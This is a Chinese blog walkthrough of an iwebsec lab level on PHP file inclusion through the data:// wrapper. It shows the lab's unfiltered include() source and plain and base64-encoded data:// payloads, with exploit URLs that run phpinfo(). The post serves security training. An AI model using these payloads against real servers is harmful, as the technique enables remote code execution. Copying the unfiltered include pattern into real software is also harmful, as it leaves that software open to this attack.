iwebsec靶场 文件包含漏洞通关笔记10-data伪协议利用

最新推荐文章于 2024-05-17 04:18:19 发布
最新推荐文章于 2024-05-17 04:18:19 发布
阅读量475 收藏 5
点赞数
分类专栏: iwebsec靶场 网络安全 文章标签: 安全 php web安全 渗透测试 iwebsec
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128077449
版权

目录

前言

1.data伪协议

2.使用条件

第10关 data://伪协议利用

1.打开靶场

2.源码分析

3.渗透

(1)明文渗透

 (2)base64编码渗透

前言

1.data伪协议

data协议和input协议差不多,指定data是get方法,而input是post方法

常用方法为

?file=data://,<?php phpinfo();?>
?file=data://text/html,<?php phpinfo();?>
?file=data:text/html,<?php phpinfo();?>
?file=data://text/html;base64,PD9waHAgcGhwaW5mbygpOz8+
?file=data:text/html;base64,PD9waHAgcGhwaW5mbygpOz8+

2.使用条件

使用条件:
1.allow_url_fopen: on
2.allow_url_include:on

第10关 data://伪协议利用

1.打开靶场

http://iwebsec.com:81/fi/10.php

 访问后如下所示,提示使用data协议进行渗透

2.源码分析

如下所示include函数对参数没有任何过滤,存在文件包含漏洞

<?php

  require_once('../header.php');
  ?>
<html>
	<head>
		<title>data://伪协议利用</title>
	</head>
	<h2>data://伪协议利用</h2>
		<div class="alert alert-success">
			<p>/10.php?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b </p>
		</div>
	<body>
<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
	
?>

3.渗透

(1)明文渗透

http://iwebsec.com:81/fi/10.php?filename=data:text/html, <?PHP phpinfo();?>

 (2)base64编码渗透

PD9waHAgcGhwaW5mbygpOz8%2b是<?php phpinfo();?>的base64编码

于是构造如下data协议,即

data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

故而文件包含渗透url为

http://iwebsec.com:81/fi/10.php?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

mooyuan天天
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
mooyuan的博客
04-20 1763
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
iwebsec靶场 文件包含漏洞通关笔记4-远程文件包含
mooyuan的博客
09-12 506
远程文件包含文件包含漏洞的其中一种。这种漏洞在文件的URI位于其他服务器上并作为参数传递给PHP函数“include”,“include_once”,“require”,或“require_once”的情况下可能会出现。
PHP伪协议-文件包含漏洞常用的伪协议_在文件包含漏洞中,使用以下哪种伪协议(1)
最新发布
2401_84545618的博客
05-17 594
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,从而实现任意代码执行,需要注意的是,当enctype=multipart/form-data时,php:/input将会无效。使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用base64对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用base64解码,就可以获取文件的源码了。最后就是大家最关心的网络安全面试题板块。
iwebsec靶场 文件包含漏洞通关笔记5-远程文件包含绕过
mooyuan的博客
04-20 1422
前言。
iwebsec靶场文件包含漏洞-php://input伪协议利用
qq_56041380的博客
04-05 624
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
文件包含漏洞2 | iwebsec
weixin_52116519的博客
03-12 783
服务器可以过滤掉执行文件包含操作的符号,例如:\,// 等,以及 php 伪协议常用字符,例如input,output,filter 等,将这些字符进行有效过滤,可以减少恶意文件操作的可能。远程文件包含(remote file include,RFI)是指包含文件的位置并不在本地服务器,而是通过URL的形式包含到其他服务器上的文件,以及执行文件中的恶意代码。:通过可控的session值,传入恶意代码,找到session文件地址、文件名,通过文件包含漏洞包含session文件,达到getshell的目的。
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
大黑客养成系列:Top10漏洞利用方式、靶场通关笔记、好用工具分享、漏洞挖掘技巧、安全研究、前沿技术探索.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
iwebsec靶场文件包含
果粒程
03-02 1170
iwebsec靶场文件包含
使用data伪协议绕过圆括号、反引号被过滤
weixin_39514626的博客
06-12 2005
data协议常用数据格式 不使用编码的方式绕过圆括号过滤 环境是https://xss.haozi.me/#/0x04 ,其中代码过滤了中括号、圆括号、反引号。于是尝试了编码绕过,使用实体编码之后很容易就绕过了。 function render (input) { const stripBracketsRe = /[()`]/g input = input.replace(stripBracketsRe, '') return input } 但是是不是还有其他的方法可以绕过呢,因为在实际测
data和filter协议文件包含
fzy2003的博客
07-05 560
掌握data协议和filter协议的用法。
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 1944
iwebsec 文件包含,详细分析,持续更新
【iwebsec靶场文件包含漏洞个人专用结题记录】(记录自己不了解的知识点)
qq_63761746的博客
03-27 183
为什么会有文件包含漏洞?什么是文件包含漏洞?
PHP 伪协议
m0_56107268的博客
11-08 5630
php伪协议
PHP伪协议详解
Python老吕的博客
03-06 2009
PHP伪协议PHP自己支持的一种协议与封装协议,简单来说就是PHP定义的一种特殊访问资源的方法。有些伪协议成功执行需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
Web安全PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2095
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
upload-labs靶场通关攻略:PHP文件上传漏洞利用
总结来说,这些关卡涵盖了文件上传漏洞绕过的常见技巧,包括利用前端验证漏洞、修改Content-Type、利用文件系统特性和配置、以及理解服务器对文件名处理的方式。这些技能对于网络安全专业人士来说至关重要,因为他们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值